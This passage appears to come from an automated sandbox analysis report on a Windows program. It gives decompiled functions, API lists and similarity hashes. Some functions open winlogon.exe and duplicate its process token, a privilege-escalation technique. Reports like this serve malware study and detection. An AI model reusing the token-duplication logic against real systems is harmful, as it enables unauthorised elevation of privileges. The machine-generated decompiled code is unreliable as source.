                                                                                                                            • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                            • memcpy.MSVCRT ref: 00405C99
                                                                                                                              • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                              • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                              • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                              • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                            • String ID: strings
                                                                                                                            • API String ID: 3166385802-3030018805
                                                                                                                            • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                            • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                            • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                            • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                            0x00401e59
                                                                                                                            0x00401e5c
                                                                                                                            0x00401e64
                                                                                                                            0x00401e67
                                                                                                                            0x00401ef9
                                                                                                                            0x00401e6d
                                                                                                                            0x00401e70
                                                                                                                            0x00401e76
                                                                                                                            0x00401e79
                                                                                                                            0x00401e7e
                                                                                                                            0x00401e83
                                                                                                                            0x00401e92
                                                                                                                            0x00401e85
                                                                                                                            0x00401e8e
                                                                                                                            0x00401e8e
                                                                                                                            0x00401e96
                                                                                                                            0x00401ee6
                                                                                                                            0x00401e98
                                                                                                                            0x00401e9b
                                                                                                                            0x00401e9e
                                                                                                                            0x00401ea3
                                                                                                                            0x00401ea8
                                                                                                                            0x00401ebb
                                                                                                                            0x00401eaa
                                                                                                                            0x00401eb7
                                                                                                                            0x00401eb7
                                                                                                                            0x00401ebf
                                                                                                                            0x00401ed3
                                                                                                                            0x00401ec1
                                                                                                                            0x00401ec7
                                                                                                                            0x00401ec9
                                                                                                                            0x00401ec9
                                                                                                                            0x00401ed8
                                                                                                                            0x00401ed8
                                                                                                                            0x00401eeb
                                                                                                                            0x00401eeb
                                                                                                                            0x00401f01

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                              • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                            • String ID: winlogon.exe
                                                                                                                            • API String ID: 1315556178-961692650
                                                                                                                            • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                            • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                            • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                            • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                            0x00405241
                                                                                                                            0x00405250
                                                                                                                            0x00405257
                                                                                                                            0x0040525f
                                                                                                                            0x00405262
                                                                                                                            0x00405265
                                                                                                                            0x00405268
                                                                                                                            0x0040526f
                                                                                                                            0x0040526f
                                                                                                                            0x00405277
                                                                                                                            0x00405277
                                                                                                                            0x0040527a
                                                                                                                            0x0040527f
                                                                                                                            0x00405284
                                                                                                                            0x00405285
                                                                                                                            0x00405291
                                                                                                                            0x00405296
                                                                                                                            0x004052a9
                                                                                                                            0x004052b3
                                                                                                                            0x004052b7
                                                                                                                            0x004052bc
                                                                                                                            0x004052ca
                                                                                                                            0x004052d2
                                                                                                                            0x004052d5
                                                                                                                            0x004052d8
                                                                                                                            0x004052d8
                                                                                                                            0x004052db
                                                                                                                            0x004052db
                                                                                                                            0x004052e1
                                                                                                                            0x004052e4
                                                                                                                            0x004052e8
                                                                                                                            0x004052f2

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                            • String ID: %s (%s)
                                                                                                                            • API String ID: 3979103747-1363028141
                                                                                                                            • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                            • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                            • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                            • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                            0x00406157
                                                                                                                            0x0040616d
                                                                                                                            0x00406174
                                                                                                                            0x0040617f
                                                                                                                            0x00406185
                                                                                                                            0x00406196
                                                                                                                            0x0040619e
                                                                                                                            0x004061b6
                                                                                                                            0x004061bd
                                                                                                                            0x004061d4
                                                                                                                            0x004061da
                                                                                                                            0x004061e0
                                                                                                                            0x004061e5
                                                                                                                            0x004061e6
                                                                                                                            0x004061ef
                                                                                                                            0x004061f9
                                                                                                                            0x004061ff
                                                                                                                            0x004061ef
                                                                                                                            0x00406206

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                            • String ID: sysdatetimepick32
                                                                                                                            • API String ID: 1028950076-4169760276
                                                                                                                            • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                            • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                            • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                            • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                            0x00404706
                                                                                                                            0x00404714
                                                                                                                            0x0040471c
                                                                                                                            0x00404721
                                                                                                                            0x0040472b
                                                                                                                            0x00404733
                                                                                                                            0x00404735
                                                                                                                            0x00404735
                                                                                                                            0x00404733
                                                                                                                            0x00404751
                                                                                                                            0x00404780
                                                                                                                            0x00404753
                                                                                                                            0x0040475e
                                                                                                                            0x00404766
                                                                                                                            0x0040476c
                                                                                                                            0x00404770
                                                                                                                            0x00404770
                                                                                                                            0x0040478a

                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                            • wcslen.MSVCRT ref: 00404756
                                                                                                                            • wcscpy.MSVCRT ref: 00404766
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                            • wcscpy.MSVCRT ref: 00404780
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                            • String ID: netmsg.dll
                                                                                                                            • API String ID: 2767993716-3706735626
                                                                                                                            • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                            • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                            • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                            • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                            0x0040598b
                                                                                                                            0x0040598b
                                                                                                                            0x0040599a
                                                                                                                            0x004059ae
                                                                                                                            0x004059b5
                                                                                                                            0x004059c1
                                                                                                                            0x004059c6
                                                                                                                            0x004059cb
                                                                                                                            0x004059ce
                                                                                                                            0x00405a7b
                                                                                                                            0x00405a7b
                                                                                                                            0x004059d4
                                                                                                                            0x004059d4
                                                                                                                            0x004059dc
                                                                                                                            0x004059ee
                                                                                                                            0x00000000
                                                                                                                            0x004059f0
                                                                                                                            0x004059f0
                                                                                                                            0x004059f6
                                                                                                                            0x004059f7
                                                                                                                            0x004059fa
                                                                                                                            0x00405a03
                                                                                                                            0x00405a2b
                                                                                                                            0x00405a2e
                                                                                                                            0x00405a3c
                                                                                                                            0x00405a40
                                                                                                                            0x00000000
                                                                                                                            0x00405a42
                                                                                                                            0x00405a42
                                                                                                                            0x00405a54
                                                                                                                            0x00405a59
                                                                                                                            0x00405a5a
                                                                                                                            0x00405a5a
                                                                                                                            0x00405a61
                                                                                                                            0x00405a69
                                                                                                                            0x00405a7f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405a69
                                                                                                                            0x00405a05
                                                                                                                            0x00405a0e
                                                                                                                            0x00405a17
                                                                                                                            0x00000000
                                                                                                                            0x00405a19
                                                                                                                            0x00405a19
                                                                                                                            0x00405a1c
                                                                                                                            0x00405a1d
                                                                                                                            0x00405a20
                                                                                                                            0x00405a29
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405a29
                                                                                                                            0x00405a17
                                                                                                                            0x00405a03
                                                                                                                            0x00000000
                                                                                                                            0x00405a6b
                                                                                                                            0x00405a6e
                                                                                                                            0x00405a72
                                                                                                                            0x00405a72
                                                                                                                            0x00000000
                                                                                                                            0x004059d4
                                                                                                                            0x00405a81
                                                                                                                            0x00405a84
                                                                                                                            0x00405a8f

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004059B5
                                                                                                                              • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                              • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                              • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                              • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                              • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                              • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                              • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                              • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                              • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                              • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                              • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                              • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                            • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                            • wcschr.MSVCRT ref: 00405A0E
                                                                                                                            • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                            • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 768606695-0
                                                                                                                            • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                            • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                            • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                            • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                            0x00407639
                                                                                                                            0x00407646
                                                                                                                            0x00407647
                                                                                                                            0x00407654
                                                                                                                            0x0040765f
                                                                                                                            0x0040765f
                                                                                                                            0x0040766b
                                                                                                                            0x0040766d
                                                                                                                            0x00407672
                                                                                                                            0x00407677
                                                                                                                            0x0040767d
                                                                                                                            0x00407680
                                                                                                                            0x00407686
                                                                                                                            0x00407691
                                                                                                                            0x00407697
                                                                                                                            0x00407699
                                                                                                                            0x00407699
                                                                                                                            0x0040769c
                                                                                                                            0x0040769f
                                                                                                                            0x004076a3
                                                                                                                            0x004076a7
                                                                                                                            0x004076ab
                                                                                                                            0x004076b5
                                                                                                                            0x004076be
                                                                                                                            0x004076c8
                                                                                                                            0x004076de
                                                                                                                            0x004076ee
                                                                                                                            0x004076f1
                                                                                                                            0x004076f4
                                                                                                                            0x004076fa
                                                                                                                            0x00407708
                                                                                                                            0x0040770e
                                                                                                                            0x00407718
                                                                                                                            0x0040771d
                                                                                                                            0x00407723
                                                                                                                            0x00407724
                                                                                                                            0x00407727
                                                                                                                            0x0040772c
                                                                                                                            0x0040772f
                                                                                                                            0x00407734
                                                                                                                            0x0040773f
                                                                                                                            0x00407744
                                                                                                                            0x00407745
                                                                                                                            0x0040767d
                                                                                                                            0x00407760

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintfwcscat
                                                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                            • API String ID: 384018552-4153097237
                                                                                                                            • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                            • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                            • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
